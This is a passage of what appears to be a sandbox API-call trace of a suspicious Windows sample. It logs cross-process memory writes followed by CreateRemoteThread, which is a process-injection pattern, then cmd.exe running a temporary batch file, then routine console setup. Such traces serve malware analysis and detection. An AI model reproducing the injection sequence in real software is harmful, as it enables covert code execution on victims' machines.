hProcess=0x150, lpBaseAddress=0x70000, lpBuffer=0x356d370*, nSize=0x1c000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x356d370*, lpNumberOfBytesWritten=0x0) returned 1 [0458.190] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0x150, lpTargetHandle=0x18f5bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5bc*=0x4) returned 1 [0458.190] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x876c4, lpBuffer=0x18f5c4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5c4*, lpNumberOfBytesWritten=0x0) returned 1 [0458.190] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x877d0, lpBuffer=0x18f5b8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5b8*, lpNumberOfBytesWritten=0x0) returned 1 [0458.191] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0x150, lpTargetHandle=0x18f5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5a0*=0x8) returned 1 [0458.191] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x87d38, lpBuffer=0x18f5a0*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0458.191] CreateRemoteThread (in: hProcess=0x150, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x795bc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x15c [0458.191] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x7d0) returned 0x0 [0458.365] CloseHandle (hObject=0x15c) returned 1 [0458.365] CloseHandle (hObject=0x158) returned 1 [0458.365] CloseHandle (hObject=0x134) returned 1 [0458.365] CloseHandle (hObject=0x150) returned 1 [0458.365] CloseHandle (hObject=0x14c) returned 1 [0458.365] ExitProcess (uExitCode=0x0) [0458.367] UnhookWindowsHookEx (hhk=0x600ef) returned 1 [0458.367] CloseHandle (hObject=0x7c) returned 1 [0458.367] CloseHandle (hObject=0x80) returned 1 [0458.368] VirtualFree (lpAddress=0x1ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0458.368] HeapDestroy (hHeap=0x250000) returned 1 Thread: id = 309 os_tid = 0x6a8 Thread: id = 311 os_tid = 0x114 [0367.892] GetCurrentThreadId () returned 0x114 [0434.892] GetCurrentThreadId () returned 0x114 Thread: id = 312 os_tid = 0x718 [0367.893] GetCurrentThreadId () returned 0x718 Thread: id = 314 os_tid = 0x7b0 [0394.933] GetCurrentThreadId () returned 0x7b0 Process: id = "23" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5e32b000" os_pid = "0x6a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x594" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f83e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3863 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3864 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3865 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3866 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3867 start_va = 0x90000 end_va = 0x93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 3868 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 3869 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3870 start_va = 0x4a530000 end_va = 0x4a57bfff entry_point = 0x4a530000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3871 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3872 start_va = 0x77cb0000 end_va = 0x77e2ffff entry_point = 0x77cb0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3873 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3874 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3875 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3876 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3877 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3878 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3879 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3880 start_va = 0x340000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 3881 start_va = 0x743d0000 end_va = 0x743d7fff entry_point = 0x743d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3882 start_va = 0x743e0000 end_va = 0x7443bfff entry_point = 0x743e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3883 start_va = 0x74440000 end_va = 0x7447efff entry_point = 0x74440000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3884 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3885 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3886 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3887 start_va = 0x530000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3888 start_va = 0x7b0000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 3889 start_va = 0x756d0000 end_va = 0x756d6fff entry_point = 0x756d0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 3890 start_va = 0x75800000 end_va = 0x7580bfff entry_point = 0x75800000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3891 start_va = 0x75810000 end_va = 0x7586ffff entry_point = 0x75810000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3892 start_va = 0x758c0000 end_va = 0x759bffff entry_point = 0x758c0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3893 start_va = 0x759c0000 end_va = 0x75acffff entry_point = 0x759c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3894 start_va = 0x75e70000 end_va = 0x75f1bfff entry_point = 0x75e70000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3895 start_va = 0x76110000 end_va = 0x761acfff entry_point = 0x76110000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3896 start_va = 0x76640000 end_va = 0x76685fff entry_point = 0x76640000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3897 start_va = 0x767d0000 end_va = 0x767e8fff entry_point = 0x767d0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3898 start_va = 0x76800000 end_va = 0x768effff entry_point = 0x76800000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3899 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3900 start_va = 0x76950000 end_va = 0x769dffff entry_point = 0x76950000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3901 start_va = 0x77740000 end_va = 0x777dffff entry_point = 0x77740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3902 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x0 region_type = private name = "private_0x00000000778b0000" filename = "" Region: id = 3903 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x0 region_type = private name = "private_0x00000000779b0000" filename = "" Region: id = 3904 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3905 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3906 start_va = 0x7c0000 end_va = 0x947fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 3907 start_va = 0x760b0000 end_va = 0x7610ffff entry_point = 0x760b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3908 start_va = 0x76570000 end_va = 0x7663bfff entry_point = 0x76570000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3909 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3910 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3911 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3912 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3913 start_va = 0x950000 end_va = 0xad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 3914 start_va = 0xae0000 end_va = 0x1edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 3915 start_va = 0x1ee0000 end_va = 0x2222fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 3916 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Thread: id = 310 os_tid = 0x464 [0338.166] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfb1c | out: lpSystemTimeAsFileTime=0x1cfb1c*(dwLowDateTime=0xd0cfd130, dwHighDateTime=0x1d38a44)) [0338.166] GetCurrentProcessId () returned 0x6a4 [0338.166] GetCurrentThreadId () returned 0x464 [0338.166] GetTickCount () returned 0xd7e7 [0338.166] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfb14 | out: lpPerformanceCount=0x1cfb14*=197193809) returned 1 [0338.167] GetModuleHandleA (lpModuleName=0x0) returned 0x4a530000 [0338.167] __set_app_type (_Type=0x1) [0338.167] __p__fmode () returned 0x75f131f4 [0338.167] __p__commode () returned 0x75f131fc [0338.168] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5521a6) returned 0x0 [0338.168] __getmainargs (in: _Argc=0x4a554238, _Argv=0x4a554240, _Env=0x4a55423c, _DoWildCard=0, _StartInfo=0x4a554140 | out: _Argc=0x4a554238, _Argv=0x4a554240, _Env=0x4a55423c) returned 0 [0338.168] GetCurrentThreadId () returned 0x464 [0338.168] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x464) returned 0x60 [0338.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759c0000 [0338.168] GetProcAddress (hModule=0x759c0000, lpProcName="SetThreadUILanguage") returned 0x759ea84f [0338.168] SetThreadUILanguage (LangId=0x0) returned 0x409 [0338.168] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0338.168] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfaac | out: phkResult=0x1cfaac*=0x0) returned 0x2 [0338.168] VirtualQuery (in: lpAddress=0x1cfae3, lpBuffer=0x1cfa7c, dwLength=0x1c | out: lpBuffer=0x1cfa7c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0338.168] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfa7c, dwLength=0x1c | out: lpBuffer=0x1cfa7c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0338.168] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfa7c, dwLength=0x1c | out: lpBuffer=0x1cfa7c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0338.168] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfa7c, dwLength=0x1c | out: lpBuffer=0x1cfa7c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0338.168] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfa7c, dwLength=0x1c | out: lpBuffer=0x1cfa7c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0338.168] GetConsoleOutputCP () returned 0x1b5 [0338.168] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0338.169] SetConsoleCtrlHandler (HandlerRoutine=0x4a54e72a, Add=1) returned 1 [0338.169] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.169] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0338.169] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.169] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0338.169] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.169] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0338.169] _get_osfhandle (_FileHandle=0) returned 0x3 [0338.169] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0338.170] _get_osfhandle (_FileHandle=0) returned 0x3 [0338.170] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0338.170] GetEnvironmentStringsW () returned 0x542080* [0338.170] FreeEnvironmentStringsW (penv=0x542080) returned 1 [0338.170] GetEnvironmentStringsW () returned 0x542080* [0338.170] FreeEnvironmentStringsW (penv=0x542080) returned 1 [0338.170] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cea1c | out: phkResult=0x1cea1c*=0x68) returned 0x0 [0338.170] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x0, lpData=0x1cea28*=0x0, lpcbData=0x1cea20*=0x1000) returned 0x2 [0338.170] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x4, lpData=0x1cea28*=0x1, lpcbData=0x1cea20*=0x4) returned 0x0 [0338.170] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x0, lpData=0x1cea28*=0x1, lpcbData=0x1cea20*=0x1000) returned 0x2 [0338.170] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x4, lpData=0x1cea28*=0x0, lpcbData=0x1cea20*=0x4) returned 0x0 [0338.170] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x4, lpData=0x1cea28*=0x40, lpcbData=0x1cea20*=0x4) returned 0x0 [0338.170] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x4, lpData=0x1cea28*=0x40, lpcbData=0x1cea20*=0x4) returned 0x0 [0338.171] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x0, lpData=0x1cea28*=0x40, lpcbData=0x1cea20*=0x1000) returned 0x2 [0338.171] RegCloseKey (hKey=0x68) returned 0x0 [0338.171] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cea1c | out: phkResult=0x1cea1c*=0x68) returned 0x0 [0338.171] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x0, lpData=0x1cea28*=0x40, lpcbData=0x1cea20*=0x1000) returned 0x2 [0338.171] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x4, lpData=0x1cea28*=0x1, lpcbData=0x1cea20*=0x4) returned 0x0 [0338.171] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x0, lpData=0x1cea28*=0x1, lpcbData=0x1cea20*=0x1000) returned 0x2 [0338.171] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x4, lpData=0x1cea28*=0x0, lpcbData=0x1cea20*=0x4) returned 0x0 [0338.171] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x4, lpData=0x1cea28*=0x9, lpcbData=0x1cea20*=0x4) returned 0x0 [0338.171] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x4, lpData=0x1cea28*=0x9, lpcbData=0x1cea20*=0x4) returned 0x0 [0338.171] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cea24, lpData=0x1cea28, lpcbData=0x1cea20*=0x1000 | out: lpType=0x1cea24*=0x0, lpData=0x1cea28*=0x9, lpcbData=0x1cea20*=0x1000) returned 0x2 [0338.171] RegCloseKey (hKey=0x68) returned 0x0 [0338.171] time (in: timer=0x0 | out: timer=0x0) returned 0x5a566204 [0338.171] srand (_Seed=0x5a566204) [0338.171] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"" [0338.171] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"" [0338.171] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a555260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.171] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x542088, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0338.172] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0338.172] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0338.172] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0338.172] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0338.172] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0338.172] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0338.172] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0338.172] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0338.172] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0338.172] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0338.172] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0338.172] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0338.172] GetEnvironmentStringsW () returned 0x542298* [0338.172] FreeEnvironmentStringsW (penv=0x542298) returned 1 [0338.172] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0338.172] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0338.172] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0338.172] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0338.172] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0338.172] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0338.172] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0338.172] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0338.172] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0338.172] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0338.172] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf7e8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1cf7e8, lpFilePart=0x1cf7e4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1cf7e4*="system32") returned 0x13 [0338.173] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0338.173] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1cf564 | out: lpFindFileData=0x1cf564) returned 0x5456c0 [0338.173] FindClose (in: hFindFile=0x5456c0 | out: hFindFile=0x5456c0) returned 1 [0338.173] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1cf564 | out: lpFindFileData=0x1cf564) returned 0x5456c0 [0338.173] FindClose (in: hFindFile=0x5456c0 | out: hFindFile=0x5456c0) returned 1 [0338.173] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0338.173] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0338.173] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0338.173] GetEnvironmentStringsW () returned 0x5440f0* [0338.173] FreeEnvironmentStringsW (penv=0x5440f0) returned 1 [0338.173] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a555260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.174] GetConsoleOutputCP () returned 0x1b5 [0338.174] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0338.174] GetUserDefaultLCID () returned 0x409 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a554950, cchData=8 | out: lpLCData=":") returned 2 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf928, cchData=128 | out: lpLCData="0") returned 2 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf928, cchData=128 | out: lpLCData="0") returned 2 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf928, cchData=128 | out: lpLCData="1") returned 2 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a554940, cchData=8 | out: lpLCData="/") returned 2 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a554d80, cchData=32 | out: lpLCData="Mon") returned 4 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a554d40, cchData=32 | out: lpLCData="Tue") returned 4 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a554d00, cchData=32 | out: lpLCData="Wed") returned 4 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a554cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a554c80, cchData=32 | out: lpLCData="Fri") returned 4 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a554c40, cchData=32 | out: 